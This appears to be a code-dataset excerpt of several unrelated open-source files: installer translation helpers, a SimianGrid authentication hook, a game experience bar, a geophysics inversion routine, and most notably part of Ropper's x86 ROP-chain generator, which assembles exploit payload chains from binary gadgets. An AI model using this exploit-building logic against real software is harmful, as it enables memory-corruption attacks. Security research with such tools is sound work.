'--auto', '--force', '--quiet')
im_switch.start_im()
return di_locale
_strip_context_re = None
def strip_context(unused_question, string):
# po-debconf context
global _strip_context_re
if _strip_context_re is None:
_strip_context_re = re.compile(r'\[\s[^\[\]]*\]$')
string = _strip_context_re.sub('', string)
return string
_translations = None
def get_translations(languages=None, core_names=[], extra_prefixes=[]):
"""Returns a dictionary {name: {language: description}} of translatable
strings.
If languages is set to a list, then only languages in that list will be
translated. If core_names is also set to a list, then any names in that
list will still be translated into all languages. If either is set, then
the dictionary returned will be built from scratch; otherwise, the last
cached version will be returned."""
global _translations
if _translations is None or languages is not None or core_names or extra_prefixes:
if languages is None:
use_langs = None
else:
use_langs = set('c')
for lang in languages:
ll_cc = lang.lower().split('.')[0]
ll = ll_cc.split('_')[0]
use_langs.add(ll_cc)
use_langs.add(ll)
prefixes = 'ubiquity|partman/text/undo_everything|partman/text/unusable|partman-basicfilesystems/bad_mountpoint|partman-basicfilesystems/text/specify_mountpoint|partman-basicmethods/text/format|partman-newworld/no_newworld|partman-partitioning|partman-target/no_root|partman-target/text/method|grub-installer/bootdev|popularity-contest/participate'
prefixes = reduce(lambda x, y: x+'|'+y, extra_prefixes, prefixes)
_translations = {}
devnull = open('/dev/null', 'w')
db = subprocess.Popen(
['debconf-copydb', 'templatedb', 'pipe',
'--config=Name:pipe', '--config=Driver:Pipe',
'--config=InFd:none',
'--pattern=^(%s)' % prefixes],
stdout=subprocess.PIPE, stderr=devnull,
# necessary?
preexec_fn=misc.regain_privileges)
question = None
descriptions = {}
fieldsplitter = re.compile(r':\s*')
for line in db.stdout:
line = line.rstrip('\n')
if ':' not in line:
if question is not None:
_translations[question] = descriptions
descriptions = {}
question = None
continue
(name, value) = fieldsplitter.split(line, 1)
if value == '':
continue
name = name.lower()
if name == 'name':
question = value
elif name.startswith('description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
descriptions[lang] = value.replace('\\n', '\n')
elif name.startswith('extended_description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
if lang not in descriptions:
descriptions[lang] = value.replace('\\n', '\n')
# TODO cjwatson 2006-09-04: a bit of a hack to get the
# description and extended description separately ...
if question in ('grub-installer/bootdev',
'partman-newworld/no_newworld',
'ubiquity/text/error_updating_installer'):
descriptions["extended:%s" % lang] = \
value.replace('\\n', '\n')
db.wait()
devnull.close()
return _translations
string_questions = {
'new_size_label': 'partman-partitioning/new_size',
'partition_create_heading_label': 'partman-partitioning/text/new',
'partition_create_type_label': 'partman-partitioning/new_partition_type',
'partition_create_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'partition_create_use_label': 'partman-target/text/method',
'partition_create_place_label': 'partman-partitioning/new_partition_place',
'partition_edit_use_label': 'partman-target/text/method',
'partition_edit_format_label': 'partman-basicmethods/text/format',
'partition_edit_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'grub_device_dialog': 'grub-installer/bootdev',
'grub_device_label': 'grub-installer/bootdev',
# TODO: it would be nice to have a neater way to handle stock buttons
'quit': 'ubiquity/imported/quit',
'back': 'ubiquity/imported/go-back',
'cancelbutton': 'ubiquity/imported/cancel',
'exitbutton': 'ubiquity/imported/quit',
'closebutton1': 'ubiquity/imported/close',
'cancelbutton1': 'ubiquity/imported/cancel',
'okbutton1': 'ubiquity/imported/ok',
}
string_extended = set()
def map_widget_name(prefix, name):
"""Map a widget name to its translatable template."""
if prefix is None:
prefix = 'ubiquity/text'
if '/' in name:
question = name
elif name in string_questions:
question = string_questions[name]
else:
question = '%s/%s' % (prefix, name)
return question
def get_string(name, lang, prefix=None):
"""Get the translation of a single string."""
question = map_widget_name(prefix, name)
translations = get_translations()
if question not in translations:
return None
if lang is None:
lang = 'c'
else:
lang = lang.lower()
if name in string_extended:
lang = 'extended:%s' % lang
if lang in translations[question]:
text = translations[question][lang]
else:
ll_cc = lang.split('.')[0]
ll = ll_cc.split('_')[0]
if ll_cc in translations[question]:
text = translations[question][ll_cc]
elif ll in translations[question]:
text = translations[question][ll]
elif lang.startswith('extended:'):
text = translations[question]['extended:c']
else:
text = translations[question]['c']
return unicode(text, 'utf-8', 'replace')
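# A usage sketch (hypothetical widget name and language; requires the debconf
# template database that get_translations() reads):
#
#     text = get_string('cancelbutton', 'de')
#     # -> the German label for the cancel button, or None if unknown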
# Based on code by Walter Dörwald:
# http://mail.python.org/pipermail/python-list/2007-January/424460.html
def ascii_transliterate(exc):
if not isinstance(exc, UnicodeEncodeError):
raise TypeError("don't know how to handle %r" % exc)
import unicodedata
s = unicodedata.normalize('NFD', exc.object[exc.start])[:1]
if ord(s) in range(128):
return s, exc.start + 1
else:
return u'', exc.start + 1
codecs.register_error('ascii_transliterate', ascii_transliterate)
# Returns a tuple of (current language, sorted choices, display map).
def get_languages(current_language_index=-1, only_installable=False):
import gzip
import PyICU
current_language = "English"
if only_installable:
from apt.cache import Cache
#workaround for an issue where euid != uid and the
#apt cache has not yet been loaded causing a SystemError
#when libapt-pkg tries to load the Cache the first time.
with misc.raised_privileges():
cache = Cache()
languagelist = gzip.open('/usr/lib/ubiquity/localechooser/languagelist.data.gz')
language_display_map = {}
i = 0
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
code, name, trans = line.strip(u'\n').split(u':')[1:]
if code in ('C', 'dz', 'km'):
i += 1
continue
if only_installable:
pkg_name = 'language-pack-%s' % code
#special case these
if pkg_name.endswith('_CN'):
pkg_name = 'language-pack-zh-hans'
elif pkg_name.endswith('_TW'):
pkg_name = 'language-pack-zh-hant'
elif pkg_name.endswith('_NO'):
pkg_name = pkg_name.split('_NO')[0]
elif pkg_name.endswith('_BR'):
pkg_name = pkg_name.split('_BR')[0]
try:
pkg = cache[pkg_name]
if not (pkg.installed or pkg.candidate):
i += 1
continue
except KeyError:
i += 1
continue
language_display_map[trans] = (name, code)
if i == current_language_index:
current_language = trans
i += 1
languagelist.close()
if only_installable:
del cache
try:
# Note that we always collate with the 'C' locale. This is far
# from ideal. But proper collation always requires a specific
# language for its collation rules (languages frequently have
# custom sorting). This at least gives us common sorting rules,
# like stripping accents.
collator = PyICU.Collator.createInstance(PyICU.Locale('C'))
except:
collator = None
def compare_choice(x):
if language_display_map[x][1] == 'C':
return None # place C first
if collator:
try:
return collator.getCollationKey(x).getByteArray()
except:
pass
# Else sort by unicode code point, which isn't ideal either,
# but also has the virtue of sorting like-glyphs together
return x
sorted_choices = sorted(language_display_map, key=compare_choice)
return current_language, sorted_choices, language_display_map
def default_locales():
languagelist = open('/usr/lib/ubiquity/localechooser/languagelist')
defaults = {}
for line in languagelist:
line = unicode(line, 'utf-8')
if line == '' or line == '\n':
continue
bits = line.strip(u'\n').split(u';')
code = bits[0]
locale = bits[4]
defaults[code] = locale
languagelist.close()
return defaults
# vim:ai:et:sts=4:tw=80:sw=4:
| gpl-3.0 | -2,029,924,248,393,744,000 | 36.698507 | 356 | 0.588645 | false | 4.005392 | false | false | false |
| antont/tundra | src/Application/PythonScriptModule/pymodules_old/simiangrid/auth.py | 1 | 2238 |
#httplib was ok and httplib2 especially had nice api, but they don't work thru proxies and stuff
#-- curl is the most robust thing
#import httplib
import curl #a high level wrapper over pycurl bindings
import json
import hashlib #only 'cause has a hardcoded pwd here now - for real this comes from connection or launcher
try:
import naali
except ImportError:
naali = None #so that can test standalone too, without Naali
else:
import circuits
class SimiangridAuthentication(circuits.BaseComponent):
pass #put disconnecting to on_exit here to not leave old versions while reloading
url = "http://localhost/Grid/"
c = curl.Curl()
def simiangrid_auth(url, username, md5hex):
params = {'RequestMethod': 'AuthorizeIdentity',
'Identifier': username,
'Type': 'md5hash',
'Credential': md5hex}
rdata = c.post(url, params)
print rdata
r = json.loads(rdata)
#http://code.google.com/p/openmetaverse/wiki/AuthorizeIdentity
success = r.get('Success', False)
    #NOTE: docs say the reply should have Success:false upon failure.
    #however, in my test run a failure reply omits it and only carries a
    #Message about missing/invalid creds - this code handles that case too.
return success
def on_connect(conn_id, userconn):
print userconn.GetLoginData()
username = userconn.GetProperty("username")
username = username.replace('_', ' ') #XXX HACK: tundra login doesn't allow spaces, whereas simiangrid frontend demands them
pwd = userconn.GetProperty("password")
md5hex = hashlib.md5(pwd).hexdigest()
success = simiangrid_auth(url, username, md5hex)
print "Authentication success:", success, "for", conn_id, userconn
if not success:
userconn.DenyConnection()
if naali is not None:
s = naali.server
if s.IsAboutToStart():
s.connect("UserAboutToConnect(int, UserConnection*)", on_connect)
print "simiangrid/auth.py running on server - hooked to authorize connections"
else:
on_connect(17, {'username': "Lady Tron",
'password': "They only want you when you're seventeen"})
"""
{ "Success":true, "UserID":"fe5f5ac3-7b28-4276-ae50-133db72040f0" }
Authentication success: True
"""
| apache-2.0 | -1,794,691,461,481,782,000 | 33.430769 | 128 | 0.689455 | false | 3.723794 | false | false | false |
| MarkusHackspacher/PythonFarmGame | farmlib/expbar.py | 1 | 2110 |
'''
Created on 31-05-2012
@author: orneo1212
'''
import pygame
from pygameui import Label
class ExpBar(Label):
"""ExpBar class
"""
def __init__(self, player):
self.player = player
self.oldexp = -1.0
Label.__init__(self, "", (9, 58))
def update_text(self):
"""update text
:return:
"""
# get data
exp = self.player.exp
nextlvlexp = self.player.nextlvlexp
level = self.player.level
self.oldexp = self.player.exp
# calculate progress and set text
progress = int(exp / nextlvlexp * 100)
self.settext("Level: " + str(level) + " Exp: {0!s}/{1!s} ({2!s} %)".
format(int(exp), int(nextlvlexp), progress))
def update(self):
"""update
:return:
"""
if self.oldexp != self.player.exp:
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.update_text()
self.size = self.width, self.height = ((48 + 2) * 6 - 1, 16)
self.create_widget_image()
# draw background
pygame.draw.rect(self.img, (0, 32, 0),
(1, 1, self.width - 1, self.height - 1))
# draw background (progress)
progresswidth = self.width / self.player.nextlvlexp * self.player.exp
pygame.draw.rect(self.img, (0, 100, 0),
(1, 1, int(progresswidth) - 1, self.height - 1))
# draw border
pygame.draw.rect(self.img, (0, 255, 0),
(1, 1, self.width - 1, self.height - 1), 1)
# draw text
text = self.gettext()
txtimg = self.labelfont.render(text, 0, (64, 255, 100), (255, 0, 255))
txtimg.set_colorkey((255, 0, 255))
# Draw centered
px = self.width / 2 - txtimg.get_size()[0] / 2
py = self.height / 2 - txtimg.get_size()[1] / 2
self.img.blit(txtimg, (px, py))
def redraw(self, surface):
"""redraw
:param surface:
:return:
"""
surface.blit(self.img, self.position)
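# A usage sketch (hypothetical player object; pygame/pygameui setup omitted).
# The player must expose .exp, .nextlvlexp and .level, as read above.
#
#     bar = ExpBar(player)
#     bar.update()          # repaints only when the exp value has changed
#     bar.redraw(screen)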
| gpl-3.0 | 8,185,247,811,750,345,000 | 26.402597 | 78 | 0.507109 | false | 3.425325 | false | false | false |
| simpeg/simpeg | SimPEG/EM/Static/IP/Run.py | 1 | 2114 |
import numpy as np
from SimPEG import (Maps, DataMisfit, Regularization,
Optimization, Inversion, InvProblem, Directives)
def run_inversion(
m0, survey, actind, mesh,
std, eps,
maxIter=15, beta0_ratio=1e0,
coolingFactor=5, coolingRate=2,
upper=np.inf, lower=-np.inf,
use_sensitivity_weight=False,
alpha_s=1e-4,
alpha_x=1.,
alpha_y=1.,
alpha_z=1.,
):
"""
Run IP inversion
"""
dmisfit = DataMisfit.l2_DataMisfit(survey)
uncert = abs(survey.dobs) * std + eps
dmisfit.W = 1./uncert
# Map for a regularization
regmap = Maps.IdentityMap(nP=int(actind.sum()))
# Related to inversion
if use_sensitivity_weight:
reg = Regularization.Sparse(
mesh, indActive=actind, mapping=regmap
)
reg.alpha_s = alpha_s
reg.alpha_x = alpha_x
reg.alpha_y = alpha_y
reg.alpha_z = alpha_z
else:
reg = Regularization.Sparse(
mesh, indActive=actind, mapping=regmap,
cell_weights=mesh.vol[actind]
)
reg.alpha_s = alpha_s
reg.alpha_x = alpha_x
reg.alpha_y = alpha_y
reg.alpha_z = alpha_z
opt = Optimization.ProjectedGNCG(maxIter=maxIter, upper=upper, lower=lower)
invProb = InvProblem.BaseInvProblem(dmisfit, reg, opt)
beta = Directives.BetaSchedule(
coolingFactor=coolingFactor, coolingRate=coolingRate
)
betaest = Directives.BetaEstimate_ByEig(beta0_ratio=beta0_ratio)
target = Directives.TargetMisfit()
    # Need to have a basic saving function
if use_sensitivity_weight:
updateSensW = Directives.UpdateSensitivityWeights()
update_Jacobi = Directives.UpdatePreconditioner()
directiveList = [
beta, betaest, target, update_Jacobi
]
else:
directiveList = [
beta, betaest, target
]
inv = Inversion.BaseInversion(
invProb, directiveList=directiveList
)
opt.LSshorten = 0.5
opt.remember('xc')
# Run inversion
mopt = inv.run(m0)
return mopt, invProb.dpred
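# A usage sketch (all names hypothetical; assumes a survey carrying observed
# data dobs, an active-cell index array actind, and a starting model m0):
#
#     mopt, dpred = run_inversion(m0, survey, actind, mesh,
#                                 std=0.05, eps=1e-3, maxIter=20)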
| mit | 3,890,722,355,732,215,300 | 28.361111 | 79 | 0.621097 | false | 3.36089 | false | false | false |
| howknows/Ropper | ropperapp/disasm/chain/arch/ropchainx86.py | 1 | 36189 |
# coding=utf-8
#
# Copyright 2014 Sascha Schirra
#
# This file is part of Ropper.
#
# Ropper is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ropper is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from ropperapp.disasm.gadget import Category
from ropperapp.common.error import *
from ropperapp.common.utils import *
from ropperapp.disasm.rop import Ropper
from ropperapp.disasm.arch import x86
from ropperapp.disasm.chain.ropchain import *
from ropperapp.loaders.loader import Type
from re import match
import itertools
import math
class RopChainX86(RopChain):
MAX_QUALI = 7
def _printHeader(self):
toReturn = ''
toReturn += ('#!/usr/bin/env python\n')
toReturn += ('# Generated by ropper ropchain generator #\n')
toReturn += ('from struct import pack\n')
toReturn += ('\n')
toReturn += ('p = lambda x : pack(\'I\', x)\n')
toReturn += ('\n')
return toReturn
def _printRebase(self):
toReturn = ''
for binary,section in self._usedBinaries:
imageBase = binary.manualImagebase + section.offset if binary.manualImagebase != None else section.virtualAddress
toReturn += ('IMAGE_BASE_%d = %s # %s\n' % (self._usedBinaries.index((binary, section)),toHex(imageBase , 4), binary.fileName))
toReturn += ('rebase_%d = lambda x : p(x + IMAGE_BASE_%d)\n\n'% (self._usedBinaries.index((binary, section)),self._usedBinaries.index((binary, section))))
return toReturn
@classmethod
def name(cls):
return ''
@classmethod
def availableGenerators(cls):
return [RopChainX86System, RopChainX86Mprotect, RopChainX86VirtualProtect]
@classmethod
def archs(self):
return [x86]
def _createDependenceChain(self, gadgets):
"""
        gadgets - list of tuples
        each tuple contains:
        - method to create the chain gadget
        - list with positional arguments
        - dict with named arguments
        - list of registers which the gadget must not overwrite
"""
failed = []
cur_len = 0
cur_chain = ''
counter = 0
max_perm = math.factorial(len(gadgets))
for x in itertools.permutations(gadgets):
counter += 1
            self._printer.puts('\r[*] Try permutation %d / %d' % (counter, max_perm))
found = False
for y in failed:
if x[:len(y)] == y:
found = True
break
if found:
continue
try:
fail = []
chain2 = ''
dontModify = []
badRegs = []
c = 0
for idx in range(len(x)):
g = x[idx]
if idx != 0:
badRegs.extend(x[idx-1][3])
dontModify.extend(g[3])
fail.append(g)
chain2 += g[0](*g[1], badRegs=badRegs, dontModify=dontModify,**g[2])[0]
cur_chain += chain2
break
except RopChainError as e:
pass
if len(fail) > cur_len:
cur_len = len(fail)
cur_chain = '# Filled registers: '
for fa in fail[:-1]:
cur_chain += (fa[2]['reg']) + ', '
cur_chain += '\n'
cur_chain += chain2
failed.append(tuple(fail))
else:
self._printer.println('')
self._printer.printInfo('Cannot create chain which fills all registers')
# print('Impossible to create complete chain')
self._printer.println('')
return cur_chain
def _isModifiedOrDereferencedAccess(self, gadget, dontModify):
regs = []
for line in gadget.lines[1:]:
line = line[1]
if '[' in line:
return True
if dontModify:
m = match('[a-z]+ (e?[abcds][ixlh]),?.*', line)
if m and m.group(1) in dontModify:
return True
return False
def _paddingNeededFor(self, gadget):
regs = []
for idx in range(1,len(gadget.lines)):
line = gadget.lines[idx][1]
matched = match('^pop (...)$', line)
if matched:
regs.append(matched.group(1))
return regs
def _printRopInstruction(self, gadget, padding=True):
toReturn = ('rop += rebase_%d(%s) # %s\n' % (self._usedBinaries.index((gadget._binary, gadget._section)),toHex(gadget.lines[0][0],4), gadget.simpleInstructionString()))
if padding:
regs = self._paddingNeededFor(gadget)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return toReturn
def _printAddString(self, string):
return ('rop += \'%s\'\n' % string)
def _printRebasedAddress(self, addr, comment='', idx=0):
return ('rop += rebase_%d(%s)\n' % (idx,addr))
def _printPaddingInstruction(self, addr='0xdeadbeef'):
return ('rop += p(%s)\n' % addr)
def _containsZeroByte(self, addr):
return addr & 0xff == 0 or addr & 0xff00 == 0 or addr & 0xff0000 == 0 or addr & 0xff000000 == 0
def _createZeroByteFillerForSub(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(i+number):
return i
def _createZeroByteFillerForAdd(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(number-i):
return i
def _find(self, category, reg=None, srcdst='dst', badDst=[], badSrc=None, dontModify=None, srcEqDst=False, switchRegs=False ):
quali = 1
while quali < RopChainX86System.MAX_QUALI:
for binary in self._binaries:
for section, gadgets in binary.gadgets.items():
for gadget in gadgets:
if gadget.category[0] == category and gadget.category[1] == quali:
if badSrc and gadget.category[2]['src'] in badSrc:
continue
if badDst and gadget.category[2]['dst'] in badDst:
continue
if not gadget.lines[len(gadget.lines)-1][1].strip().endswith('ret') or 'esp' in gadget.simpleString():
continue
if srcEqDst and (not (gadget.category[2]['dst'] == gadget.category[2]['src'])):
continue
elif not srcEqDst and 'src' in gadget.category[2] and (gadget.category[2]['dst'] == gadget.category[2]['src']):
continue
if self._isModifiedOrDereferencedAccess(gadget, dontModify):
continue
if reg:
if gadget.category[2][srcdst] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
elif switchRegs:
other = 'src' if srcdst == 'dst' else 'dst'
if gadget.category[2][other] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
else:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
quali += 1
def _createWriteStringWhere(self, what, where, reg=None, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build writewhatwhere gadget!')
write4 = self._find(Category.WRITE_MEM, reg=popReg.category[2]['dst'], badDst=
badDst, srcdst='src')
if not write4:
badRegs.append(popReg.category[2]['dst'])
continue
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[popReg.category[2]['dst']]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
                    break
if len(what) % 4 > 0:
what += ' ' * (4 - len(what) % 4)
toReturn = ''
for index in range(0,len(what),4):
part = what[index:index+4]
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printAddString(part)
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where+index,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,popReg.category[2]['dst'], popReg2.category[2]['dst'])
def _createWriteRegValueWhere(self, what, where, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
write4 = self._find(Category.WRITE_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not write4:
raise RopChainError('Cannot build writewhatwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[what]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
                    break
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFrom(self, what, from_reg, dontModify=[], idx=0):
try:
return self._createLoadRegValueFromMov(what, from_reg, dontModify, idx)
except:
return self._createLoadRegValueFromXchg(what, from_reg, dontModify, idx)
def _createLoadRegValueFromMov(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.LOAD_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='dst')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=load4.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
                    break
toReturn = self._printRopInstruction(popReg2, False)
        toReturn += self._printRebasedAddress(toHex(from_reg,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFromXchg(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.XCHG_REG, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
mov = self._find(Category.LOAD_MEM, reg=load4.category[2]['dst'], badDst=badDst, dontModify=[load4.category[2]['dst']]+dontModify, srcdst='dst')
if not mov:
badDst.append(load4.category[2]['dst'])
continue
popReg2 = self._find(Category.LOAD_REG, reg=mov.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
                    break
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(from_reg,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
            toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(mov)
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createNumberSubtract(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.SUB_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with subtract gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
                badRegs.append(sub.category[2]['src'])
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
                badRegs.append(sub.category[2]['dst'])
continue
else:
                break
filler = self._createZeroByteFillerForSub(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(filler+number,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberAddition(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.ADD_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with addition gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
                badRegs.append(sub.category[2]['src'])
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
badRegs.append(sub.category[2]['dst'])
continue
else:
                break
filler = self._createZeroByteFillerForAdd(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(number - filler,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberPop(self, number, reg=None, badRegs=None, dontModify=None):
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number with xor gadget!')
incReg = self._find(Category.INC_REG, reg=popReg.category[2]['dst'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(popReg.category[2]['dst'])
else:
break
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(0xffffffff,4))
for i in range(number+1):
toReturn += self._printRopInstruction(incReg)
return (toReturn ,popReg.category[2]['dst'],)
def _createNumberXOR(self, number, reg=None, badRegs=None, dontModify=None):
while True:
clearReg = self._find(Category.CLEAR_REG, reg=reg, badDst=badRegs, badSrc=badRegs,dontModify=dontModify, srcEqDst=True)
if not clearReg:
raise RopChainError('Cannot build number with xor gadget!')
if number > 0:
incReg = self._find(Category.INC_REG, reg=clearReg.category[2]['src'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(clearReg.category[2]['src'])
else:
break
else:
break
toReturn = self._printRopInstruction(clearReg)
for i in range(number):
toReturn += self._printRopInstruction(incReg)
return (toReturn, clearReg.category[2]['dst'],)
def _createNumberXchg(self, number, reg=None, badRegs=None, dontModify=None):
xchg = self._find(Category.XCHG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not xchg:
raise RopChainError('Cannot build number gadget with xchg!')
        other = xchg.category[2]['src'] if xchg.category[2]['dst'] == reg else xchg.category[2]['dst']
toReturn = self._createNumber(number, other, badRegs, dontModify)[0]
toReturn += self._printRopInstruction(xchg)
return (toReturn, reg, other)
def _createNumberNeg(self, number, reg=None, badRegs=None, dontModify=None):
if number == 0:
raise RopChainError('Cannot build number gadget with neg if number is 0!')
neg = self._find(Category.NEG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not neg:
raise RopChainError('Cannot build number gadget with neg!')
pop = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not pop:
raise RopChainError('Cannot build number gadget with neg!')
toReturn = self._printRopInstruction(pop)
        toReturn += self._printPaddingInstruction(toHex(((~number) + 1) & 0xffffffff, 4))  # two's complement
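        # Illustrative: for number=0x01010101 the chain pops 0xfefefeff
        # (which contains no zero bytes) and the neg gadget restores
        # 0x01010101 in the target register.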
toReturn += self._printRopInstruction(neg)
return (toReturn, reg,)
def _createNumber(self, number, reg=None, badRegs=None, dontModify=None, xchg=True):
try:
if self._containsZeroByte(number):
try:
return self._createNumberNeg(number, reg, badRegs,dontModify)
except RopChainError as e:
if number < 50:
try:
return self._createNumberXOR(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberPop(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
                    else:
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else:
                popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number gadget!')
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(number,4))
return (toReturn , popReg.category[2]['dst'])
except:
return self._createNumberXchg(number, reg, badRegs, dontModify)
def _createAddress(self, address, reg=None, badRegs=None, dontModify=None):
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build address gadget!')
toReturn = ''
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printRebasedAddress(toHex(address, 4), idx=self._usedBinaries.index((popReg._binary, popReg._section)))
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
            toReturn += self._printPaddingInstruction()
return (toReturn,popReg.category[2]['dst'])
def _createSyscall(self, reg=None, badRegs=None, dontModify=None):
syscall = self._find(Category.SYSCALL, reg=None, badDst=None, dontModify=dontModify)
if not syscall:
raise RopChainError('Cannot build syscall gadget!')
toReturn = ''
toReturn += self._printRopInstruction(syscall)
return (toReturn,)
def _createOpcode(self, opcode):
return self._printRopInstruction(self._searchOpcode(opcode))
def _searchOpcode(self, opcode):
